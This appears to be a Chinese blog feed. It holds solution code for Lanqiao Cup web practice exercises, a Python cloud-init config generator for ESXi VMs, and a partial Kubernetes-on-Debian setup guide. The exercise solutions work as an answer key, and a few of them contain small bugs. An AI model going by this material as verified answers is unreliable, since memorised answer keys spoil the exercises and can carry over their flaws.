var myChart = echarts.init(document.getElementById('main')); // 指定图表的配置项和数据 var option = { title: { text: '学生成绩统计' }, tooltip: {}, legend: { data: ['成绩'] }, // TODO:待补充修改代码 yAxis: { }, // y轴 xAxis: { data: ['张三', '李四', '王五', '贺八', '杨七', '陈九'] }, series: [ { name: '成绩', type: 'bar', data: [55, 90, 65, 70, 80, 63] }, ] }; // 使用刚指定的配置项和数据显示图表。 myChart.setOption(option); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; </code></pre> <p>这道题平台给的打码有问题,将yAxis改成xAxis, yAxis 留空即可</p> <h2>【功能实现】时间管理大师</h2> <pre><code>&lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;meta charset="utf-8"&gt; &lt;title&gt;任务管理器&lt;/title&gt; &lt;link type="text/css" href="css/style.css" rel="stylesheet" /&gt; &lt;/head&gt; &lt;body&gt; &lt;div id="box"&gt; &lt;div &gt; &lt;h2&gt;Todos&lt;/h2&gt; &lt;p&gt;罗列日常计划,做一个时间管理大师!&lt;/p&gt; &lt;div &gt; &lt;span&gt;内容&lt;/span&gt; &lt;input type="text" placeholder="请输入你要做的事" v-model="newTodo"/&gt; &lt;span id='add' @click="add()"&gt;确认&lt;/span&gt; &lt;/div&gt; &lt;/div&gt; &lt;ul &gt; &lt;li v-if="todos.length==0"&gt; 暂无数据 &lt;/li&gt; &lt;li v-for="(item,index) in todos" :key="index"&gt; &lt;!-- 前面的序号 --&gt; &lt;span &gt;{{index++}}&lt;/span&gt; &lt;!-- 列表内容 --&gt; &lt;span&gt;{{item}}&lt;/span&gt; &lt;!-- 删除按钮 --&gt; &lt;span @click="deleted()"&gt;&lt;/span&gt; &lt;/li&gt; &lt;li v-if="todos.length!=0"&gt; &lt;b&gt; 总数:{{todos.length}} &lt;/b&gt; &lt;b id='clear' @click="clear()"&gt;清除&lt;/b&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt; &lt;script src="js/vue.js"&gt;&lt;/script&gt; &lt;script&gt; var top= new Vue({ el:"#box", // 在此处补全代码,实现所需功能 data(){ return{ todos:[],//存储数据的链表 newTodo:"",//新添加的todo } }, methods:{//生命周期钩子 add(){ if(this.newTodo =="") { this.newTodo = "" }else{ this.todos.push(this.newTodo.trim()) console.log(this.newTodo.trim()) } this.newTodo=""//回复为空字符串,避免二次添加 }, clear(){ this.todos=[]//清空列表 }, deleted(index){ this.todos.splice(index,1)//splice(index,1) 方法就是从index下标开始删除一个元素,这里正好就是删除index元素自身 } } }) &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; </code></pre> <h2>【功能实现】菜单树检索</h2> <pre><code>&lt;!-- index.html --&gt; &lt;!DOCTYPE html&gt; &lt;html lang="zh"&gt; &lt;head&gt; &lt;meta charset="UTF-8"&gt; &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt; &lt;meta http-equiv="X-UA-Compatible" content="ie=edge"&gt; &lt;title&gt;test&lt;/title&gt; &lt;script src="./js/vue.js"&gt;&lt;/script&gt; &lt;script src="./js/axios.min.js"&gt;&lt;/script&gt; &lt;style&gt; input{ width: 200px; height: 32px; padding-left:5px; } &lt;/style&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- 需求:输入待查找的字段,输出包含该字段的所有菜单数据。 1、若该菜单有父级菜单,则返回其父级菜单及同胞菜单。 2、若该菜单有子级菜单,则返回该菜单及其下子级菜单。 3、若该菜单既无父级也无子级,则返回菜单本身即可。 测试字段:查询、首页、管理、配置、维护 --&gt; &lt;div id="app"&gt; &lt;input type="text" placeholder="请输入要搜索的菜单内容" v-model="searchData"/&gt; &lt;ul&gt; &lt;li v-for="item in filteredMenus" :key="item.meta.title"&gt; &lt;span :style="{ backgroundColor: item.checked ? 'yellow' : '' }"&gt;{{ item.meta.title }}&lt;/span&gt; &lt;ul v-if="item.children &amp;&amp; item.children.length"&gt; &lt;li v-for="child in item.children" :key="child.meta.title"&gt; &lt;span :style="{ backgroundColor: child.checked ? 'yellow' : '' }"&gt;{{ child.meta.title }}&lt;/span&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt; &lt;/body&gt; &lt;script type="text/javascript" src="./js/index.js"&gt;&lt;/script&gt; &lt;/html&gt; //index.js const app = new Vue({ el: "#app", data() { return { menus: [], searchData: "", }; }, mounted() { axios.get('data.json').then(res =&gt; { this.menus = res.data; }).catch(err =&gt; { console.error("加载菜单数据失败", err); }); }, computed: { filteredMenus() { if (!this.searchData.trim()) { return this.menus; } return this.filterMenu(this.searchData.trim()); } }, methods: { filterMenu(value) { // 深拷贝菜单数据,避免污染原数据 const menus = JSON.parse(JSON.stringify(this.menus)); // 递归过滤函数 function filterTree(items) { return items .map(item =&gt; { // 先过滤子菜单 if (item.children) { item.children = filterTree(item.children); } // 当前菜单是否匹配 或 有匹配的子菜单 if ( item.meta.title.includes(value) || (item.children &amp;&amp; item.children.length &gt; 0) ) { // 标记高亮,匹配项为 true,否则 false item.checked = item.meta.title.includes(value); return item; } // 不匹配则过滤掉 return null; }) .filter(item =&gt; item !== null); } return filterTree(menus); } } }); </code></pre> <h2>让时钟转起来</h2> <pre><code>const oHoure = document.createElement('div'); const oMinute = document.createElement('div'); const oSecond = document.createElement('div'); oHoure.setAttribute('id', 'houre'); oMinute.setAttribute('id', 'minute'); oSecond.setAttribute('id', 'second'); oHoure.classList = 'pointer'; oMinute.classList = 'pointer'; oSecond.classList = 'pointer'; try { document.querySelector('.container').append(oHoure); document.querySelector('.container').append(oMinute); document.querySelector('.container').append(oSecond); } catch (e) { } function main() { const nowTime = new Date(); const nowHoure = nowTime.getHours(); const nowMinute = nowTime.getMinutes(); const nowSecond = nowTime.getSeconds(); const houreDeg = (nowMinute / 60) * 30; const minuteDeg = (nowSecond / 60) * 6; oHoure.style.transform = "rotate(" + (nowHoure * 30 + houreDeg) + "deg)"; oMinute.style.transform = "rotate(" + (nowMinute * 6 + minuteDeg) + "deg)"; // 请勿删除上方代码 // 请在下方补充代码,使得时钟的秒针可以转动起来 //nowSecond 是秒针 nowSecond.style.transform 可以直接修改秒针的css //rotate() 是transfor的一个参数,让元素围绕中心点旋转 oSecond.style.transform="rotate(" + (nowSecond * 6) + "deg)"; } main(); setInterval(() =&gt; { main() }, 1000); </code></pre> <h2>由文本溢出引发的“不友好体验”</h2> <pre><code>&lt;!DOCTYPE html&gt; &lt;html lang="en"&gt; &lt;head&gt; &lt;meta charset="UTF-8"&gt; &lt;title&gt;由文本溢出引发的“不友好体验”&lt;/title&gt; &lt;link rel="stylesheet" href="https://labfile.oss.aliyuncs.com/courses/9203/03style.css"&gt; &lt;/head&gt; &lt;body&gt; &lt;div &gt; &lt;ul&gt; &lt;li &gt;&lt;span &gt;&lt;/span&gt;&lt;a href="" target="_blank"&gt; &lt;div &gt;&lt;img src="https://labfile.oss.aliyuncs.com/courses/9203/04_02.jpg" alt=""&gt; &lt;/div&gt; &lt;div &gt; &lt;p &gt; &lt;i &gt;新课&lt;/i&gt; 随着前端的发展,UI 框架经历了刀耕火种的时代,层出不穷的 UI 框架让前端再次大放异彩。ElementUI 作为前端发展史上最为经典的组件库之一,学习并了解它是如何构建的,以及它的源码是如何搭建出 UI 组件的,都将为我们今后的发展与应用提供可借鉴之处! &lt;/p&gt; &lt;div &gt; &lt;div &gt;&lt;i&gt;¥&lt;/i&gt;&lt;span &gt;72.&lt;span &gt;00&lt;/span&gt;&lt;/span&gt;&lt;/div&gt; &lt;/div&gt; &lt;/div&gt; &lt;/a&gt;&lt;/li&gt; &lt;/ul&gt; &lt;/div&gt; &lt;script&gt; // -webkit-line-clamp: 2; // /* 规定行数为2 */ // overflow: hidden; // /* 隐藏超出部分 */ // text-overflow: ellipsis; // /* 超出部分用省略号代替 */ document.querySelector('.more2_info_name').style="-webkit-line-clamp: 2;overflow: hidden;text-overflow: ellipsis;" &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; </code></pre> <h2>为图片添加景深效果</h2> <pre><code>&lt;html&gt; &lt;head&gt; &lt;META charset="utf-8"&gt; &lt;meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"&gt; &lt;title&gt;为图片添加景深效果&lt;/title&gt; &lt;link rel="stylesheet" href="https://labfile.oss.aliyuncs.com/courses/9203/style06.css"&gt; &lt;/head&gt; &lt;body&gt; &lt;header&gt; &lt;div&gt;&lt;img src="https://labfile.oss.aliyuncs.com/courses/9203/autumn-1.png" title="枫叶林"&gt;&lt;/div&gt; &lt;div&gt;&lt;img src="https://labfile.oss.aliyuncs.com/courses/9203/autumn-2.png" title="人物"&gt;&lt;/div&gt; &lt;div&gt;&lt;img src="https://labfile.oss.aliyuncs.com/courses/9203/autumn-3.png"&gt;&lt;/div&gt; &lt;div&gt;&lt;img src="https://labfile.oss.aliyuncs.com/courses/9203/autumn-4.png"&gt;&lt;/div&gt; &lt;div&gt;&lt;img src="https://labfile.oss.aliyuncs.com/courses/9203/autumn-5.png"&gt;&lt;/div&gt; &lt;div&gt;&lt;img src="https://labfile.oss.aliyuncs.com/courses/9203/autumn-6.png"&gt;&lt;/div&gt; &lt;/header&gt; &lt;script&gt; // 请在这里编写代码,根据需求,使得图片达到景深效果 document.querySelector('.img1').style.filter="blur(0px)" document.querySelector('.img2').style.filter="blur(0px)" &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; </code></pre> <h2>element-ui 组件二次封装</h2> <pre><code>&lt;template&gt; &lt;div &gt; &lt;el-table ref="singleTable" highlight-current-row :data="tableData" stripe border style="width: 100%" &gt; &lt;el-table-column label="单选" width="80"&gt; &lt;!-- TODO:完善单选按钮组件,实现需求(DOM 结构不能修改) --&gt; &lt;template slot-scope="scope"&gt; &lt;el-radio :label="scope.$index" v-model="currentRow"&gt; &lt;/el-radio&gt; &lt;/template&gt; &lt;/el-table-column&gt; &lt;el-table-column label="日期" width="180"&gt; &lt;template slot-scope="scope"&gt; 📅&lt;span style="margin-left: 10px"&gt;{{ scope.row.date }}&lt;/span&gt; &lt;/template&gt; &lt;/el-table-column&gt; &lt;el-table-column prop="name" label="姓名" width="180"&gt; &lt;/el-table-column&gt; &lt;el-table-column prop="address" label="地址"&gt; &lt;/el-table-column&gt; &lt;/el-table&gt; &lt;div &gt; &lt;el-button @click="setCurrent(tableData[1])"&gt;选中第二行&lt;/el-button&gt; &lt;el-button @click="setCurrent()"&gt;取消选择&lt;/el-button&gt; &lt;/div&gt; &lt;/div&gt; &lt;/template&gt; &lt;script&gt; module.exports = { props: { tableData: { type: Array, default: () =&gt; [], }, }, data() { return { currentRow: null, }; }, methods: { setCurrent(row) { this.$refs.singleTable.setCurrentRow(row); // 设置当前选中行 }, }, }; &lt;/script&gt; &lt;style scoped&gt; .main { width: 60%; margin: 0 auto; } .tools { margin-top: 20px; text-align: center; } &lt;/style&gt; </code></pre> <h2>凭空消失的 TA</h2> <pre><code> &lt;script src="./element-ui-2.15.10/index.js" &gt;&lt;/script&gt; </code></pre> <h2>用户名片</h2> <pre><code>.center { position: absolute; /* 绝对定位 */ top: 50%; left: 50%; transform: translate(-50%,-50%); } </code></pre> <h2>网页 PPT</h2> <pre><code>const sections = document.querySelectorAll(".container section") function switchPage() { // TODO: 请补充该函数,实现根据activeIndex切换页面的功能,并且在到达最后一页或第一页时给相应的按钮添加disable类 sections.forEach(item =&gt; item.style.display='none') sections[activeIndex].style.display='block' document.querySelectorAll('.btn').forEach(item=&gt;item.classList.remove('disable')) if(activeIndex ==4 ) {document.querySelector('.right').classList.add('disable')} if(activeIndex ==0 ) { document.querySelector('.left').classList.add('disable') } document.querySelector('.page').textContent = `${activeIndex+1}/5` } </code></pre> <h2>西游记之西天取经</h2> <pre><code> animation: a4 0.8s steps(8) infinite; </code></pre> <p>为 animation 添加 infinite 属性即可,使动画无限循环。</p> <h2>商品销量和销售额实时展示看板</h2> <pre><code> // TODO:补全 `yAxis` 的设置,要求“销售额”(即,配置项 `name`)的位置(即,配置项 `position`)在图表的左侧,“销量”(即,配置项 `name`)的位置(即,配置项 `position`)在图表的右侧。 yAxis: [{ type: 'value', name: '销售额', position: 'left', }, { type: 'value', name: '销量', position: 'right', }], // TODO:补全代码,正确给 X 轴的时间,以及 Y 轴的商品的销售额 saleObj 和销量赋值 countObj。 charData.xAxis.data = Object.keys(result.data.countObj) charData.series[0].data = Object.values(result.data.saleObj) charData.series[1].data = Object.values(result.data.countObj) </code></pre> <h2>电影院排座位</h2> <pre><code>/* TODO:待补充代码 */ .seat-area { display: grid; margin-top: 50px; gap: 10px; grid-template-columns: 45px 65px 45px 45px 45px 65px 45px 45px; } </code></pre> <h2>图片水印生成</h2> <pre><code> for (let index = 0; index &lt; count; index++) { container.innerHTML +='&lt;span style="color:'+color +';transform: rotate('+deg+'deg); opacity:'+opacity+'"&gt;'+text+'&lt;/span&gt;' } </code></pre> 蓝桥杯web刷题记录1https://blog.fiveqm.com/archives/527/https://blog.fiveqm.com/archives/527/【页面布局】个人博客 / TODO:banner 上的文字 需要居中显示 / .home-wrapper .banner .banner-conent .hero { text-align: center; / 文字居中 / margin-top: 3rem; } / TODO: main-wrap...Mon, 21 Jul 2025 04:40:14 GMT<h2><strong>【页面布局】个人博客</strong></h2> <pre><code>/* TODO:banner 上的文字 需要居中显示 */ .home-wrapper .banner .banner-conent .hero { text-align: center; /* 文字居中 */ margin-top: 3rem; } /* TODO: main-wrapper 通过设置main-wrapper 布局方式 让.main-left .main-right 正确显示 */ .main-wrapper { display: flex; /* 使用flex布局 */ margin: 1.5rem auto 0 auto; max-width: 1100px; padding: 0 0.9rem; box-sizing: border-box; position: relative; } /*/* TODO 宽度自适应 居左显示 */ .main-wrapper .main-left { width: auto; /*宽带自适应*/ } /* 宽 245px 居右显示 */ .main-wrapper .main-right&gt;* { box-sizing: border-box; width: 245px;/* 宽 245px */ } </code></pre> <h2>修复网站显示问题</h2> <pre><code> &lt;link rel="stylesheet" href="css/style.css" /&gt; </code></pre> <p>难评</p> <h2>【功能实现】搜一搜呀</h2> <pre><code> computed: { filteredList() { // TODO: 请补充代码 const keyword = this.search.trim() //去除空格 //filter 方法遍历 postList 数组中的每一个元素 return this.postList.filter(post =&gt; post.title.includes(keyword)) }, }, }); </code></pre> <h2>【功能实现】折叠手风琴</h2> <pre><code>const showed = document.querySelector('.options') // 整个容器 const show = document.querySelectorAll('.option') // 所有选项卡 // 给整个容器加事件监听器(事件委托) showed.addEventListener('click', (err) =&gt; { // 1. 所有选项移除 active 类 show.forEach(i =&gt; i.classList.remove("active")) // 2. 给你点击的元素加上 active 类 err.target.classList.add("active") }) </code></pre> <h2>关于你的欢迎语</h2> <pre><code>function generate() { subject = document.getElementById("subject"); event1 = document.getElementById("event1"); event2 = document.getElementById("event2"); if (subject.length==0 || event1.length==0 || event2.length==0){ return; } result = `欢迎用户${subject.value}在${event2.value}学习${event1.value}课程!`; //使用字符串拼接 document.getElementById("result").value = result; } </code></pre> <h2>【功能实现】卡片化标签页</h2> <pre><code>// 实现选项卡功能 function init() { // TODO 待补充代码 const tabs = document.querySelectorAll(".tabs div") const contents = document.querySelectorAll("#content div") tabs.forEach((tab,index)=&gt; { tab.addEventListener('click',()=&gt;{ tabs.forEach(i =&gt; i.classList.remove("active")) tab.classList.add("active") contents.forEach(s=&gt;{ s.classList.remove('active') contents[index].classList.add('active') }) }) }) } init(); </code></pre> <p>记得删除tabs里的无用类名</p> <h2>【页面布局】 水果摆盘</h2> <pre><code>/* 菠萝 TODO 待补充代码 */ .yellow { align-self: flex-end; order: 1; /* | 属性 | 作用 | | ------------ | ------------------------ | | `align-self` | 控制该元素在主轴垂直方向上的对齐方式(如底部) | | `order` | 控制该元素在父元素中的排列顺序(数字越小越靠前) | */ } </code></pre> <h2>【功能实现】新年贺卡</h2> <pre><code>document.addEventListener('DOMContentLoaded', function () { const greetingDisplay = document.getElementById("greeting-display") const btn = document.getElementById("btn") // 点击开始书写按钮 btn.addEventListener("click", () =&gt; { show(greetingDisplay) }) }) const greetings = [ "新年快乐!", "接受我新春的祝愿,祝你平安幸福", "祝你新年快乐,洋洋得意!", "新的一年,新的开始;心的祝福,新的起点!", "新年好!祝新年心情好,身体好,一切顺心!", ] // 随机数函数 从 greetings 随机取一个值并返回 function writeGreeting() { // TODO 带补充代码 const res = Math.floor(Math.random() * 5)//随机生成0-4的整数 console.log(greetings[res]) return greetings[res] } /* * @param {*} greetingDisplay 要显示内容的dom元素 */ // show 将 writeGreeting 函数中返回的内容显示在 greetingDisplay 元素中 function show(greetingDisplay) { // TODO 待补充代码 greetingDisplay.innerHTML = writeGreeting() } module.exports = { show, writeGreeting } </code></pre> <h2>【页面布局】给页面化个妆</h2> <pre><code>* { box-sizing: border-box; margin: 0; padding: 0; } body { background-image: url('../images/background-pic.jpeg'); background-size: cover; color: #fff; height: 945; width: 1920; } .nav-bar { display: flex; align-items: center; justify-content: flex-end; } .nav-bar img { height: 50px; width: 50px; border-radius: 50%; margin: 15px; } /* 我自己写的 */ .content-container { margin-top: 70px; /* 给主体内容一个上边距,让它不会贴着页面顶部 */ } .content { height: 600px; width: 450px; background-color: rgba(0, 0, 0, .45); margin: 0 auto; /* 水平居中(margin: 0 auto); */ border-radius: 10px; text-align: center; } .content img { width: 200px; height: 200px; border-radius: 50%; margin-top: -20%; /* margin-top: -20%:向上浮动,让头像部分“插入”背景中 */ } .content h2 { font-size: 45px; font-weight: 800; margin-bottom: 40px; } .content button { width: 80px; height: 30px; border-color: #041c32; background-color: #2d4263; color: white; margin-top: 15px; } .content a { text-decoration: none; color: white; } .text { margin-top: 15px; /* margin-top: 15px:与上面输入框拉开间距。 */ } .content input { text-align: center; width: 300px; height: 40px; font-size: 20px; border-radius: 5px; margin: 10px; } </code></pre> Cloud-init ESXi 尝试https://blog.fiveqm.com/archives/509/https://blog.fiveqm.com/archives/509/我这里使用ESXI 7.0.3 和 jammy-server-cloudimg-amd64.ova 进行尝试cloud-init 使用ova创建虚拟机 ,先不要开机,在编辑->高级 中添加cloud-init的base64参数,保存后开机 guestinfo.userdata guestinfo.u...Mon, 21 Jul 2025 02:48:11 GMT<p>我这里使用ESXI 7.0.3 和 <a href="https://cloud-images.ubuntu.com/jammy/current/jammy-server-cloudimg-amd64.ova">jammy-server-cloudimg-amd64.ova</a> 进行尝试cloud-init</p> <p>使用ova创建虚拟机 ,先不要开机,在编辑-&gt;高级 中添加cloud-init的base64参数,保存后开机</p> <ul> <li>guestinfo.userdata</li> <li>guestinfo.userdata.encoding="base64"</li> <li>guestinfo.metadata</li> <li>guestinfo.metadata.encoding="base64"</li> </ul> <p>python生成配置脚本</p> <pre><code>import uuid import base64 import shutil import subprocess from pathlib import Path from textwrap import dedent from pyfiglet import Figlet # --- 配置区 --- OUTPUT_BASE_DIR = Path("./cloudinit_output") HOSTNAMES = [ "ubuntu-master", "ubuntu-worker01", "ubuntu-worker02" ] # --- 配置区结束 --- def generate_ssh_keypair(key_path: Path): key_path.parent.mkdir(parents=True, exist_ok=True) if key_path.exists(): print(f"密钥文件已存在,跳过生成:{key_path}") return print(f"生成新的 SSH 密钥对: {key_path}") try: subprocess.run( ["ssh-keygen", "-t", "rsa", "-b", "4096", "-f", str(key_path), "-N", "", "-q"], check=True ) print(f"密钥对已生成: {key_path} 和 {key_path.with_suffix('.pub')}") except (FileNotFoundError, subprocess.CalledProcessError) as e: print(f"[X] ssh-keygen 命令执行失败: {e}") print("[i] 请确保您的系统中安装了 OpenSSH 客户端,并且 'ssh-keygen' 在系统 PATH 中。") raise def get_ssh_pubkey(pubkey_path: Path) -&gt; str: if not pubkey_path.exists(): raise FileNotFoundError(f"公钥文件不存在: {pubkey_path}") return pubkey_path.read_text(encoding="utf-8").strip() def manual_input_pubkey() -&gt; str: while True: print("\n请输入 SSH 公钥(单行格式,如 ssh-rsa AAAA...),输入完成后按回车:") key = input("公钥: ").strip() if key.startswith("ssh-rsa") or key.startswith("ssh-ed25519"): return key print("输入无效。公钥通常以 'ssh-rsa' 或 'ssh-ed25519' 开头。请重试。") """ #cloud-config hostname: {hostname} fqdn: {hostname}.local manage_etc_hosts: true # 用户和认证设置 disable_root: false ssh_pwauth: false users: - name: root # 关键修正:'ssh_authorized_keys' 必须与 'name' 对齐 ssh_authorized_keys: - {ssh_key} # (可选) 设置 root 密码 # chpasswd: # list: | # root:password123 # expire: false # 启动后执行的命令 runcmd: # 1. 替换 APT 软件源为清华大学镜像 (推荐保留) - sed -i 's@https?://[^/]+/ubuntu/@https://mirrors.tuna.tsinghua.edu.cn/ubuntu/@g' /etc/apt/sources.list # 2. 增强 SSH 安全性,禁止 root 密码登录 - sed -i 's/^#?PermitRootLogin.*/PermitRootLogin prohibit-password/' /etc/ssh/sshd_config # 3. 重启 SSH 服务使配置生效 - systemctl restart sshd # 4. 更新系统 - apt-get update - apt-get upgrade -y """ def generate_user_data(hostname: str, ssh_key: str) -&gt; str: return dedent(f"""\ #cloud-config hostname: {hostname} fqdn: {hostname}.local manage_etc_hosts: true disable_root: false ssh_pwauth: false users: - name: root ssh_authorized_keys: - {ssh_key} runcmd: - sed -i 's@https?://[^/]+/ubuntu/@https://mirrors.tuna.tsinghua.edu.cn/ubuntu/@g' /etc/apt/sources.list - sed -i 's/^#?PermitRootLogin.*/PermitRootLogin prohibit-password/' /etc/ssh/sshd_config - systemctl restart sshd - apt-get update - apt-get upgrade -y """) def generate_meta_data(hostname: str) -&gt; str: instance_id = f"{hostname}-{uuid.uuid4().hex[:8]}" return dedent(f"""\ instance-id: {instance_id} local-hostname: {hostname} """) def create_cloud_init_iso(hostname: str, source_dir: Path): command_name = "genisoimage" command_path = shutil.which(command_name) if not command_path: command_name = "mkisofs" command_path = shutil.which(command_name) if not command_path: print(f"[!] 警告: 未找到 'genisoimage' 或 'mkisofs' 命令,无法为 {hostname} 创建 seed.iso。") print(" - 在 Debian/Ubuntu 上, 请运行: sudo apt-get install -y cloud-image-utils") print(" - 在 CentOS/RHEL/Fedora 上, 请运行: sudo yum install -y genisoimage") print(" - 在 Windows 上, 您可以安装 cdrtools 或手动创建 ISO。") return iso_path = source_dir / "seed.iso" print(f"正在为 {hostname} 创建 cloud-init ISO: {iso_path} (使用 {command_name})") try: subprocess.run( [ command_path, "-output", str(iso_path), "-volid", "cidata", "-joliet", "-rock", str(source_dir) ], check=True, capture_output=True ) print(f"[√] 成功创建 {iso_path}") except subprocess.CalledProcessError as e: print(f"[X] 使用 {command_name} 创建 ISO 失败:") print(f" 错误码: {e.returncode}") print(f" 错误输出: {e.stderr.decode(errors='ignore')}") def main(): print("--- Cloud-Init 配置生成器 ---") ssh_pub_key = "" while True: choice = input( "请选择 SSH 公key获取方式:\n1) 手动输入公钥\n2) 自动生成/使用现有密钥对\n请输入 1 或 2: ").strip() if choice in ["1", "2"]: break print("无效选择,请重试。") try: if choice == "1": ssh_pub_key = manual_input_pubkey() else: priv_key_path = OUTPUT_BASE_DIR / "auth" / "id_rsa" generate_ssh_keypair(priv_key_path) ssh_pub_key = get_ssh_pubkey(priv_key_path.with_suffix(".pub")) print(f"\n[i] 将使用以下公钥(位于 {priv_key_path.with_suffix('.pub')}):") print(ssh_pub_key) except Exception as e: print(f"\n[X] 获取SSH密钥时发生错误: {e}") return while True: out_choice = input( "\n请选择输出格式:\n1) 生成独立文件和 seed.iso (用于 NoCloud 数据源)\n2) 生成 Base64 键值对 (同时保存原始YAML文件)\n请输入 1 或 2: ").strip() if out_choice in ["1", "2"]: break print("无效选择,请重试。") print("\n--- 开始生成配置文件 ---") if out_choice == "1": for hostname in HOSTNAMES: host_dir = OUTPUT_BASE_DIR / hostname host_dir.mkdir(parents=True, exist_ok=True) user_data = generate_user_data(hostname, ssh_pub_key) meta_data = generate_meta_data(hostname) (host_dir / "user-data").write_text(user_data, encoding="utf-8") (host_dir / "meta-data").write_text(meta_data, encoding="utf-8") print(f"[√] 已为 {hostname} 生成配置文件于: {host_dir}/") create_cloud_init_iso(hostname, host_dir) else: # out_choice == "2" all_configs_path = OUTPUT_BASE_DIR / "all_hosts_guestinfo.txt" all_configs_path.parent.mkdir(parents=True, exist_ok=True) with all_configs_path.open("w", encoding="utf-8") as f_all: for i, hostname in enumerate(HOSTNAMES): print(f"\n--- 正在处理: {hostname} ---") # 关键修复:使用 ssh_pub_key 而不是 ssh_key user_data_str = generate_user_data(hostname, ssh_pub_key) meta_data_str = generate_meta_data(hostname) host_dir = OUTPUT_BASE_DIR / hostname host_dir.mkdir(parents=True, exist_ok=True) (host_dir / "user-data.yaml").write_text(user_data_str, encoding="utf-8") (host_dir / "meta-data.yaml").write_text(meta_data_str, encoding="utf-8") print(f"[i] 原始YAML文件已保存至: {host_dir}/") user_data_b64 = base64.b64encode(user_data_str.encode("utf-8")).decode("utf-8") meta_data_b64 = base64.b64encode(meta_data_str.encode("utf-8")).decode("utf-8") output_content = dedent(f"""\ # Hostname: {hostname} guestinfo.userdata="{user_data_b64}" guestinfo.userdata.encoding="base64" guestinfo.metadata="{meta_data_b64}" guestinfo.metadata.encoding="base64" """) print(f"[√] 正在生成 Base64 配置...") if i &gt; 0: f_all.write("\n") f_all.write(output_content) print(f"\n[√] 所有主机的 Base64 配置已合并保存到: {all_configs_path}") print("\n--- 所有任务完成 ---") if __name__ == "__main__": try: f = Figlet(font='slant') print(f.renderText('cloud-init creat config by inuyume')) except NameError: print("--- cloud-init creat config by inuyume ---") main() print( "\n[Hint] : 如果想使用SSH密码,请在generate_user_data的dedent中修改prohibit-password为yes并取消chpasswd的注释并修改默认的password123") print( "\n[Hint] : 请注意保存生成的公钥和私钥和生成的配置文件,相同目录下运行脚本会覆盖旧的生成文件,密钥默认使用已有的密钥!") </code></pre> Debain12 部署Kubernetes 1.32.5 单节点 教程https://blog.fiveqm.com/archives/448/https://blog.fiveqm.com/archives/448/1.准备工作我这里使用 ESXi 7.0 U2 创建虚拟机 cpu 8c 内存 8g 系统 debain 12 ip 192.168.xxx.70 2.开始部署 关闭 swap sed -ri 's/^^.swap.$/\1/' /etc/fstab && grep swap /etc/fstab ...Sun, 01 Jun 2025 06:03:26 GMT<p>1.准备工作(我这里使用 ESXi 7.0 U2 创建虚拟机)</p> <ul> <li>cpu 8c</li> <li>内存 8g</li> <li>系统 debain 12</li> <li>ip 192.168.xxx.70</li> </ul> <p>2.开始部署</p> <p>关闭 swap</p> <pre><code>sed -ri 's/^([^#].*swap.*)$/#\1/' /etc/fstab &amp;&amp; grep swap /etc/fstab &amp;&amp; swapoff -a &amp;&amp; free -h </code></pre> <p>如果安装了防火墙请关闭防火墙</p> <pre><code>ufw disable </code></pre> <p>开启ipv4转发</p> <pre><code>cat &lt;&lt;EOF | sudo tee /etc/sysctl.d/k8s.conf net.ipv4.ip_forward = 1 EOF sysctl --system sysctl net.ipv4.ip_forward </code></pre> <p>设置hostname</p> <pre><code>nano /etc/hostname debain-master </code></pre> <p>设置host</p> <pre><code>nano /etc/hosts 127.0.0.1 localhost 127.0.1.1 debain-master # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters </code></pre> <p>安装containerd</p> <pre><code>apt update &amp;&amp; apt install -y containerd </code></pre> <p>查看containerd版本</p> <pre><code>containerd -v root@debian:~# containerd -v containerd github.com/containerd/containerd 1.6.20~ds1 1.6.20~ds1-1+deb12u1 </code></pre> <p>生成默认containerd配置文件</p> <pre><code>mkdir -p /etc/containerd &amp;&amp; containerd config default&gt;/etc/containerd/config.toml </code></pre> <p>编辑配置文件</p> <p>nano /etc/containerd/config.toml</p> <p>修改plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc.options 的 SystemdCgroup = fales 为 true</p> <p>修改sandbox_image = "registry.k8s.io/pause:3.6" 为sandbox_image = "registry.aliyuncs.com/google_containers/pause:3.9"</p> <pre><code>#config.toml disabled_plugins = [] imports = [] oom_score = 0 plugin_dir = "" required_plugins = [] root = "/var/lib/containerd" state = "/run/containerd" temp = "" version = 2 [cgroup] path = "" [debug] address = "" format = "" gid = 0 level = "" uid = 0 [grpc] address = "/run/containerd/containerd.sock" gid = 0 max_recv_message_size = 16777216 max_send_message_size = 16777216 tcp_address = "" tcp_tls_ca = "" tcp_tls_cert = "" tcp_tls_key = "" uid = 0 [metrics] address = "" grpc_histogram = false [plugins] [plugins."io.containerd.gc.v1.scheduler"] deletion_threshold = 0 mutation_threshold = 100 pause_threshold = 0.02 schedule_delay = "0s" startup_delay = "100ms" [plugins."io.containerd.grpc.v1.cri"] device_ownership_from_security_context = false disable_apparmor = false disable_cgroup = false disable_hugetlb_controller = true disable_proc_mount = false disable_tcp_service = true enable_selinux = false enable_tls_streaming = false enable_unprivileged_icmp = false enable_unprivileged_ports = false ignore_image_defined_volumes = false max_concurrent_downloads = 3 max_container_log_line_size = 16384 netns_mounts_under_state_dir = false restrict_oom_score_adj = false sandbox_image = "registry.aliyuncs.com/google_containers/pause:3.9" selinux_category_range = 1024 stats_collect_period = 10 stream_idle_timeout = "4h0m0s" stream_server_address = "127.0.0.1" stream_server_port = "0" systemd_cgroup = false tolerate_missing_hugetlb_controller = true unset_seccomp_profile = "" [plugins."io.containerd.grpc.v1.cri".cni] bin_dir = "/opt/cni/bin" conf_dir = "/etc/cni/net.d" conf_template = "" ip_pref = "" max_conf_num = 1 [plugins."io.containerd.grpc.v1.cri".containerd] default_runtime_name = "runc" disable_snapshot_annotations = true discard_unpacked_layers = false ignore_rdt_not_enabled_errors = false no_pivot = false snapshotter = "overlayfs" [plugins."io.containerd.grpc.v1.cri".containerd.default_runtime] base_runtime_spec = "" cni_conf_dir = "" cni_max_conf_num = 0 container_annotations = [] pod_annotations = [] 